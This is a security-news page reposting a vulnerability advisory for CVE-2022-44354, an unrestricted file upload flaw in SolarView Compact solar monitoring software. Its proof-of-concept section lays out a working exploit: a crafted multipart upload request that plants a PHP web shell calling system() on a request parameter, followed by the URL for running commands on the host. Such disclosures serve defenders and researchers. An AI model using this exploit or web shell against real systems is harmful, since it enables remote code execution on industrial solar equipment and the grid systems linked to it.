Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44354: Vulns/Unrestricted File Upload_ SolarView Compact 4.0,5.0.md at main · strik3r0x1/Vulns

SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.

CVE
Open in Source
#vulnerability#php#rce

Permalink

Cannot retrieve contributors at this time

Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0****Description

Unrestricted File Upload vulnerability in SolarView Compact 4.0,5.0 at /Solar_Image.php can allow attackers to get a Remote Code Execution on the vulnerable host via upload crafted php file.

POC

  1. navigate to /Solar_Image.php

  2. upload any php file and caputre the request

  3. update the userfile and upfilename parameters like this:

    -----------------------------168287165333758025211172961484 Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: application/octet-stream

    <?php echo “Shell";system($_GET[‘cmd’]); ?> -----------------------------168287165333758025211172961484 Content-Disposition: form-data; name="upfilename”

    shell.php -----------------------------168287165333758025211172961484

  1. send the request and navigate to /images/background/shell.php?cmd=ls

Related news

3 Critical RCE Bugs Threaten Industrial Solar Panels, Endangering Grid Systems

Exposed and unpatched solar power monitoring systems have been exploited by both amateurs and professionals, including Mirai botnet hackers.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE